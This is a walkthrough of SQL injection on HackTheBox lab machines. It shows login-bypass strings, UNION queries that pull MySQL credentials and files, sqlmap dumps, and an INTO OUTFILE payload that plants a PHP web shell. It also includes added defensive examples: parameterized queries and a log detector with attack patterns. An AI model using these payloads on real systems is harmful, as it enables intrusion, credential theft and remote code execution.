SQL Injection Methods
How to identify SQL injection
Refer to the web page below (a sample hotel reservation website) from the HackTheBox machine.

I am going to add ' and see if there are any errors.
Actual URL
http://10.10.10.143/room.php?cod=1

URL tested for SQL injection
http://10.10.10.143/room.php?cod=1'
There are no errors, but the page appears broken. This hints at a SQL injection vulnerability.
Another example of detecting SQL injection manually:
See the blog post page below:

Try adding ' at the end, as in the previous example, to see if there are any errors. There are no errors and the page even loads normally.

This could also indicate a possible SQL injection.
Using sqlmap to identify SQL injection
The sqlmap tool can also be used to verify SQL injection. The URL above was tested with sqlmap as follows:
sqlmap -u http://10.10.10.143/room.php?cod=1
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:44:14 /2022-04-18/
[19:44:14] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=pa8drq7eju8...fj50giiq54'). Do you want to use those [Y/n] y
[19:44:19] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:44:20] [INFO] testing if the target URL content is stable
[19:44:20] [INFO] target URL content is stable
[19:44:49] [INFO] GET parameter 'cod' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'cod' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
[19:45:12] [ERROR] user quit
Authentication bypass using SQL injection
Suppose there is a username/password authentication page. In theory, the authentication works as follows:
select * from users where username = '[username]' and password = hash('[password]');
Once we enter the username and password, the application looks them up in the database and grants access if they match.
If the site is vulnerable to SQL injection, we can enter values like the ones below in the username/password field, which may bypass the actual username/password check:
admin' or 1=1 limit 1;-- -
'or' '=' 'or'

This is how the SQL authentication bypass works. These queries are used when we do not know the username/password. Once we submit this input, the lookup becomes:
select * from users where username = 'admin' or 1=1 limit 1;-- -' and password = [hash];
Some similar strings for authentication bypass can be found at "SQL injection | OWASP Bricks Login page #1".
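The bypass described above, as an added example that is not part of the original post: a login check that splices the input into the query string, next to the same lookup with bound parameters, run against a constructed in-memory SQLite users table (SQLite stands in for MySQL so it runs offline; the table name users, the pw_hash helper and the sample credentials are assumptions).

```python
import hashlib
import sqlite3


def pw_hash(password):
    # Stand-in for the page's hash('[password]'): SHA-256 hex digest, illustration only.
    return hashlib.sha256(password.encode()).hexdigest()


def make_users_db():
    # Constructed in-memory users table; the accounts and passwords are made up.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("admin", pw_hash("correct-horse")), ("guest", pw_hash("guest"))])
    return conn


def login_vulnerable(conn, username, password):
    # Mirrors the page's query: the username is spliced straight into the SQL text,
    # so a quote in the input closes the string and "or 1=1" makes WHERE always true;
    # everything after "-- " (including the real password check) becomes a comment.
    sql = ("select * from users where username = '%s' and password = '%s'"
           % (username, pw_hash(password)))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    # Same lookup with bound parameters: quotes, OR and comment markers stay data,
    # so the literal string "admin' or 1=1 limit 1;-- -" matches no username.
    sql = "select * from users where username = ? and password = ?"
    return conn.execute(sql, (username, pw_hash(password))).fetchone() is not None


if __name__ == "__main__":
    conn = make_users_db()
    bypass = "admin' or 1=1 limit 1;-- -"
    print("vulnerable, bypass string:", login_vulnerable(conn, bypass, "wrong"))  # True
    print("parameterized, bypass string:", login_safe(conn, bypass, "wrong"))     # False
    print("parameterized, real creds:", login_safe(conn, "admin", "correct-horse"))  # True
```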

Fuzzing Method
In the method above we manually tried a few SQL injection strings to bypass the login. The same can be tried automatically with a fuzzing tool, so that a large wordlist of SQL injection strings is tested. For this we use the tool ffuf.
The command format used for ffuf is as follows:
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -H "Content-Type: application/x-www-form-urlencoded"
Each option is explained here:
-X POST (POST request)
-u http://10.10.11.101/administrative (URL we want to fuzz)
-d 'uname=FUZZ&password=testpassword' (the FUZZ keyword is replaced with each entry of the chosen wordlist)
-w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt (wordlist)
-H "Content-Type: application/x-www-form-urlencoded" (default Content-Type header for login forms)
Sample output:
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -H "Content-Type: application/x-www-form-urlencoded" --fw 206
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : POST
:: URL : http://10.10.11.101/administrative
:: Wordlist : FUZZ: /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : uname=FUZZ&password=testpassword
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 206
________________________________________________
admin' or ' [Status: 200, Size: 1296, Words: 280, Lines: 33]
hi' or 'x'='x'; [Status: 200, Size: 1296, Words: 280, Lines: 33]
x' or 1=1 or 'x'='y [Status: 200, Size: 1296, Words: 280, Lines: 33]
' or 1=1 or ''=' [Status: 200, Size: 1296, Words: 280, Lines: 33]
' or 0=0 # [Status: 200, Size: 1296, Words: 280, Lines: 33]
Initially, when I ran it, the output looked messy. I wanted to filter it, so I used the most common word count shown initially, which is 206, and added the --fw 206 option to the command above. Without this option the output contains a lot of unnecessary results.

If you are using a proxy, you can add the proxy option as well, like this:
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -x http://127.0.0.1:8080 -H "Content-Type: application/x-www-form-urlencoded" --fw 206
Let's try to log in with one of the results from ffuf, and I can see that it works as well:

SQL queries and true/false statements
A SQL query has a form like the one below. Each database has multiple tables, and each table has different columns. Using SQL injection techniques we focus on getting the data from the columns of each table and database.
SQL query format:
SELECT col1,col2,col3... from table WHERE id=$_GET['cod'];
We add AND 1=1;-- -, which is always true. Assuming cod=1, the query becomes:
SELECT col1,col2,col3... from table WHERE id=$_GET['cod'] AND 1=1;-- -
The trailing -- - comments out the rest of the SQL statement. Typically -- would suffice, but MySQL requires whitespace after --, and browsers drop a trailing space from the URL when we are not sending the request through Burp, so the extra - keeps that space in place.
Let's try different combinations. Initially I tried the URLs below, and they returned some results:
http://10.10.10.143/room.php?cod=1%20AND%201=1;-- -
http://10.10.10.143/room.php?cod=1%20AND%201=2;-- -
http://10.10.10.143/room.php?cod=1%20AND%201=3;-- -
No errors, as shown below.

If you try the page below, it gives a blank page but no errors.

These confirm that some form of SQL injection is possible here.
Union Injection
The 1=1 condition is needed only to test whether SQL injection is possible.
To perform a UNION injection we need to know the number of columns. Recall the SQL query format discussed above:
SELECT col1,col2,col3... from table WHERE id=$_GET['cod'];
In this case we need to find out how many columns the query returns.
The URL below gives a blank page:
http://10.10.10.143/room.php?cod=99 UNION SELECT 1;-- -
We can try adding more columns like this:
http://10.10.10.143/room.php?cod=99 UNION SELECT 1;-- -
http://10.10.10.143/room.php?cod=99 UNION SELECT 1,2;-- -
http://10.10.10.143/room.php?cod=99 UNION SELECT 1,2,3;-- -
http://10.10.10.143/room.php?cod=99 UNION SELECT 1,2,3,4;-- -
All of these pages returned a blank page like this, because the number of columns was wrong. The query only returned useful information once it reached 7 columns:
http://10.10.10.143/room.php?cod=99 UNION SELECT 1,2,3,4,5,6,7;-- -

Comparing with the actual page, we can see that 5 = picture, 2 = room title, 3 = room price and 4 = room description.
Column 2 appears most clearly, so we will use column 2 for further enumeration via SQL injection.
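To show why the pages above went blank until the column count matched, here is an added example (not from the original post) that rebuilds the room query in an in-memory SQLite table with the seven column names the walkthrough enumerates later (cod, name, price, descrip, star, image, mini), reproduces the AND 1=1 / AND 1=2 and UNION column-count observations, and shows the hardened version that casts cod to an integer and binds it. SQLite stands in for MySQL and the sample row is constructed.

```python
import sqlite3

# Constructed in-memory copy of the seven-column room table; the row data is made up.
ROOM_COLUMNS = ("cod", "name", "price", "descrip", "star", "image", "mini")


def make_room_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table room (cod integer, name text, price text, descrip text,"
                 " star integer, image text, mini text)")
    conn.execute("insert into room values (1, 'Superior Family Room', '$249',"
                 " 'Two queen beds', 4, 'room1.jpg', 'mini1.jpg')")
    return conn


def room_vulnerable(conn, cod):
    """Mirrors SELECT ... WHERE id=$_GET['cod']: cod is spliced in unquoted.
    Returns the first row, or None where the real page rendered blank
    (no matching row, or a SQL error the PHP page swallowed)."""
    sql = "select %s from room where cod=%s" % (",".join(ROOM_COLUMNS), cod)
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        # A UNION whose column count differs from the original SELECT is a SQL
        # error; with error display off this is exactly the "blank page".
        return None


def room_safe(conn, cod):
    """Hardened form: cod must parse as an integer and is bound as a parameter,
    so no SQL keyword in the input ever reaches the parser."""
    try:
        cod_int = int(cod)
    except (TypeError, ValueError):
        return None
    sql = "select %s from room where cod=?" % ",".join(ROOM_COLUMNS)
    return conn.execute(sql, (cod_int,)).fetchone()


def union_column_count(conn, max_cols=10):
    """Reproduces the walkthrough's observation: UNION SELECT 1 .. 1,2,...,n stays
    blank until n equals the number of columns the original query selects."""
    for n in range(1, max_cols + 1):
        markers = ",".join(str(i) for i in range(1, n + 1))
        if room_vulnerable(conn, "99 UNION SELECT %s;-- -" % markers) is not None:
            return n
    return None


if __name__ == "__main__":
    conn = make_room_db()
    print(room_vulnerable(conn, "1 AND 1=1;-- -") is not None)    # True: row shown
    print(room_vulnerable(conn, "1 AND 1=2;-- -") is not None)    # False: blank page
    print(union_column_count(conn))                               # 7
    print(room_safe(conn, "99 UNION SELECT 1,2,3,4,5,6,7;-- -"))  # None: not an integer
```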
Union injection, another example:
I am using one of these strings, ' or 0=0 #, to log in to the login page as shown below. Make sure to capture the request with Burp to see what is happening in the background:

burp capture

Let's try a UNION injection like the earlier example:
UNION injection payload to be modified via Burp (the reason we add ' in front of the UNION values is that the form has to log in; without the ' it never logs in and the database table is never consulted):
' UNION select 1;-- -

I keep adding UNION values, like ' UNION select 1,2,3;-- -, with no change in the response and no errors, as in the previous example. This hints that the page may be vulnerable to UNION SQL injection.

When the UNION values reach ' UNION select 1,2,3,4,5,6;-- - we can see some results in the response in Burp. This shows the current query returns 6 columns, and the 2nd column is the one that previously displayed the username; it is now replaced with the number 2 that we specified in the injection.

So from now on we will use column 2 for injection. Let's find the current database name:
uname=' UNION select 1,database(),3,4,5,6;-- -&password=test

To find all databases:
uname=' UNION select 1,schema_name,3,4,5,6 from information_schema.schemata;-- -&password=test

To put it in a more readable format we can use the group_concat function like this:
UNION select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata

How to read a system/server file using load_file in a SQL injection
The query that can be used:
uname=' UNION select 1,load_file("/etc/lsb-release"),3,4,5,6;-- -&password=test

Group_concat method
The group_concat function can be used in SQL queries to concatenate multiple values so they are displayed in a single field. There is a good SQL injection queries cheat sheet, "MySQL SQL Injection Cheat Sheet | pentestmonkey", available from pentestmonkey.
Using the cheat sheet we can formulate the SQL queries for exfiltration.
Finding the database name:
Actual query: SELECT 1, group_concat(schema_name), 3, 4, 5, 6, 7 from information_schema.schemata;-- -
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,group_concat(schema_name),3,4,5,6,7 from information_schema.schemata;-- -
Results

hotel,information_schema,mysql,performance_schema
Enumerating the tables from the identified database:
Query: UNION ALL SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema='Databasename';-- -
Sample query to find the tables of database "hotel" in the above URL:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema='hotel' ;-- -

Results:
Only one table found in database hotel:
room
Enumerating one more database to find its tables
Here is the sample query to find the tables of another database, "mysql":
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema='mysql' ;-- -

Result:
column_stats,columns_priv,db,event,func,general_log,gtid_slave_pos,help_category,help_keyword,help_relation,help_topic,host,index_stats,innodb_index_st
Finding the columns from the table
In the scenario above we enumerated the tables from 2 databases.
Database: hotel Tables: room
Database:mysql Tables: column_stats,columns_priv,db,event,func,general_log,gtid_slave_pos,help_category,help_keyword,help_relation,help_topic,host,index_stats,innodb_index_stats,innodb_table_stats,plugin,proc,procs_priv,proxies_priv,roles_mapping,servers,slow_log,table_stats,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user
Query: UNION ALL SELECT 1, group_concat(column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_name='tablename';-- -
Sample query to find the columns of the table room:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1, group_concat(column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_name='room';-- -

Result:
cod,name,price,descrip,star,image,mini
One more query, to find the columns of table "user" from database "mysql":
Query: UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns WHERE table_schema='mysql' and table_name='user';-- -
Sample query:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns WHERE table_schema='mysql' and table_name='user';-- -
Result:
Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,Re

Finding the values of each column
We have identified multiple interesting columns above (host, user, password, select_priv) by enumerating the schema.
Query for finding the values of each column: UNION ALL SELECT 1,group_concat(Column1,":",Column2,":",Column3,":",Column4),3,4,5,6,7 from mysql.user;--
Sample query to find the values of (host, user, password, privilege); we use ":" to separate the values, as they will be displayed in a single row:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,group_concat(Host,":",User,":",Password,":",File_priv),3,4,5,6,7 from mysql.user;--

Result:
localhost:DBadmin:****7D29964D0:y
We have exfiltrated sensitive information (host, user, db, priv) from the table "user" of database "mysql".
As well as doing this in the browser, sometimes we have to do it by intercepting the request via Burp (as shown in the previous example). Refer to that example again:

Exfiltration without using the group_concat function
Since we have identified that there are 7 columns, we were using the group_concat function to get the required values into a single field in column 2. We chose column 2 because it was the most visible.
There is another method, without the group_concat function, which can be used if you need only a small number of columns.
Query without group_concat: UNION ALL SELECT 1, column1, 3, 4, column2, 6, 7 from Databasename.Tablename;-- -
Sample query (in this case I am going to exfiltrate only 2 columns):
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1, user,3, 4,password, 6, 7 from mysql.user;-- -

We can see the values of the DB username and DB password above.
To view files
Once we have confirmed the SQL injection, we can try the load_file function to view system files such as /etc/passwd.
Query format: UNION ALL SELECT 1,load_file("filepath"),3,4,5,6,7 from databasename.tablename;-- -
Sample query to view /etc/passwd in the above case:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,load_file("/etc/passwd"),3,4,5,6,7 from mysql.user;-- -

One more example:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,load_file("/var/www/html/index.php"),3,4,5,6,7 from mysql.user;-- -

In case you want to encode the file contents and view them, use this query:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,TO_BASE64(LOAD_FILE("/var/www/html/index.php")),3,4,5,6,7 from mysql.user;-- -

sqlmap
sqlmap was used earlier to find out whether the URL is vulnerable to SQL injection. That is not its only use: it can also enumerate database details, as we did manually in the earlier example from the browser or by intercepting requests.
In this example it is a login page. Enter any username and password, intercept the request and save it on the local PC as a file (in this case it is saved as login.req).

sqlmap to identify the SQL injection
sqlmap -r login.req
[*] starting @ 21:42:47 /2022-06-25/
[21:42:47] [INFO] parsing HTTP request from 'login.req'
[21:42:47] [INFO] resuming back-end DBMS 'mysql'
[21:42:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[21:42:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
In the output above, SQL injection via a UNION query is indicated.
Finding the databases using sqlmap
The example above showed that UNION SQL injection is possible. With the command below we can enumerate the database names:
sqlmap -r login.req --dbs
[*] starting @ 21:45:14 /2022-06-25/
[21:45:14] [INFO] parsing HTTP request from 'login.req'
[21:45:14] [INFO] resuming back-end DBMS 'mysql'
[21:45:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[21:45:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:45:15] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] writer
[21:45:16] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
We have found 2 database names.
sqlmap to identify the tables in a database
Let's enumerate the table names of database "writer" from the above example:
sqlmap -r login.req -D writer --tables
[*] starting @ 21:48:44 /2022-06-25/
[21:48:44] [INFO] parsing HTTP request from 'login.req'
[21:48:44] [INFO] resuming back-end DBMS 'mysql'
[21:48:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[21:48:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:48:45] [INFO] fetching tables for database: 'writer'
Database: writer
[3 tables]
+---------+
| site |
| stories |
| users |
+---------+
[21:48:45] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
sqlmap to dump the contents of a specific table in a database
In this example we dump the data of the table "users" from database "writer". Note that sometimes these dumps can be large.
sqlmap -r login.req -D writer -T users --dump
[*] starting @ 21:51:32 /2022-06-25/
[21:51:32] [INFO] parsing HTTP request from 'login.req'
[21:51:32] [INFO] resuming back-end DBMS 'mysql'
[21:51:32] [INFO] testing connection to the target URL
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: writer
Table: users
[1 entry]
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email | status | password | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1 | adm***@writer.htb | Active | 118e4879463********* | admin | NULL |
+----+------------------+--------+----------------------------------+----------+--------------+
[21:51:45] [INFO] table 'writer.users' dumped to CSV file '/home/rocky/.local/share/sqlmap/output/10.10.11.101/dump/writer/users.csv'
[21:51:45] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
We got a username and a password hash. The hash can be cracked by comparing it against a wordlist with tools like hashcat or john.
View/read files using sqlmap
In the example above, you may notice that sqlmap not only displays the database details but also downloads the information and stores it on the local PC.
Review the output carefully and you will see lines like this:
[21:48:45] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101
Using sqlmap we can also download a remote file so we can view it:
sqlmap -r login.req --file-read=/etc/lsb-release
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_lsb-release (same file)
[05:32:11] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
cat /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"
sqlmap -r login.req --file-read=/etc/passwd
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_passwd (same file)
[05:42:55] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
cat /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
postfix:x:113:118::/var/spool/postfix:/usr/sbin/nologin
filter:x:997:997:Postfix Filters:/var/spool/filter:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/bash
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
Write a file using the OUTFILE function
Let's use the OUTFILE function to create a new file. We start with a simple test file.
Query:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,'testing',3,4,5,6,7 INTO OUTFILE '/var/www/html/test.txt';-- -
Result:

Now let's upload a command shell.
Query format:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,'<?php echo system($_REQUEST ["cmd"]); ?>',3,4,5,6,7 INTO OUTFILE '/var/www/html/cmd.php';-- -
Results:
Access http://10.10.10.143/cmd.php?cmd=id
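From the defender's side, the URL patterns used throughout this walkthrough (boolean probes, UNION SELECT, information_schema lookups, load_file, INTO OUTFILE, the dropped cmd.php) are all visible in web server access logs. This added example (not part of the original post) parses constructed combined-format log lines that replay the requests above and tags each one with the indicators it matches; the indicator names, the sample IP addresses and the response sizes are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Indicator rules distilled from the payloads shown on this page. They are an
# illustrative rule set written for this example, not a vendor or WAF signature list.
INDICATORS = [
    ("boolean-probe", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("union-select",  re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("schema-enum",   re.compile(r"\binformation_schema\.", re.I)),
    ("file-read",     re.compile(r"\bload_file\s*\(", re.I)),
    ("file-write",    re.compile(r"\binto\s+outfile\b", re.I)),
    ("time-based",    re.compile(r"\bsleep\s*\(", re.I)),  # sqlmap's blind payload; POST bodies need body logging
    ("webshell-use",  re.compile(r"\.php\?cmd=", re.I)),
]

# Apache/nginx combined log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')


def decode_path(path):
    # Decode twice: %20 and + both mean space, and tools sometimes double-encode.
    return unquote_plus(unquote_plus(path))


def classify(path):
    """Return the list of indicator names matching one request path."""
    decoded = decode_path(path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan(lines):
    """Parse log lines and return (ip, path, status, tags) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["path"])
        if tags:
            hits.append((m["ip"], m["path"], m["status"], tags))
    return hits


def by_source(hits):
    """Aggregate indicator names per client IP so one noisy source stands out."""
    summary = {}
    for ip, _path, _status, tags in hits:
        summary.setdefault(ip, set()).update(tags)
    return summary


# Constructed sample log replaying the request sequence described on this page.
SAMPLE_LOG = [
    '10.10.14.5 - - [18/Apr/2022:19:44:14 +0000] "GET /room.php?cod=1 HTTP/1.1" 200 4821',
    '10.10.14.5 - - [18/Apr/2022:19:44:20 +0000] "GET /room.php?cod=1%20AND%201=1;--%20- HTTP/1.1" 200 4821',
    '10.10.14.5 - - [18/Apr/2022:19:44:25 +0000] "GET /room.php?cod=1%20AND%201=2;--%20- HTTP/1.1" 200 1106',
    '10.10.14.5 - - [18/Apr/2022:19:45:01 +0000] "GET /room.php?cod=99%20UNION%20SELECT%201,2,3,4,5,6,7;--%20- HTTP/1.1" 200 4790',
    '10.10.14.5 - - [18/Apr/2022:19:45:30 +0000] "GET /room.php?cod=99%20UNION%20ALL%20SELECT%201,group_concat(schema_name),3,4,5,6,7%20from%20information_schema.schemata;--%20- HTTP/1.1" 200 4810',
    '10.10.14.5 - - [18/Apr/2022:19:46:02 +0000] "GET /room.php?cod=99%20UNION%20ALL%20SELECT%201,load_file(%22/etc/passwd%22),3,4,5,6,7%20from%20mysql.user;--%20- HTTP/1.1" 200 6233',
    '10.10.14.5 - - [18/Apr/2022:19:47:10 +0000] "GET /room.php?cod=99%20UNION%20ALL%20SELECT%201,%27testing%27,3,4,5,6,7%20INTO%20OUTFILE%20%27/var/www/html/test.txt%27;--%20- HTTP/1.1" 200 1106',
    '10.10.14.5 - - [18/Apr/2022:19:48:00 +0000] "GET /cmd.php?cmd=id HTTP/1.1" 200 61',
    '192.168.1.20 - - [18/Apr/2022:19:48:05 +0000] "GET /room.php?cod=2 HTTP/1.1" 200 4799',
]

if __name__ == "__main__":
    for ip, path, status, tags in scan(SAMPLE_LOG):
        print(ip, status, ",".join(tags), decode_path(path))
```

The blank-page responses stand out as the same client alternating between the normal page size and a much smaller one while the path carries SQL keywords, which is the boolean and column-count probing described above.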

Reverse shell
In the section above we uploaded a web command shell and tested commands. Let's use the same shell and use Burp to pass the command for a netcat reverse shell.
Query: http://10.10.10.143/cmd.php?cmd=id
Now edit the Burp request, add the netcat reverse shell command, and make sure to URL-encode it as follows:

We now have a reverse shell.
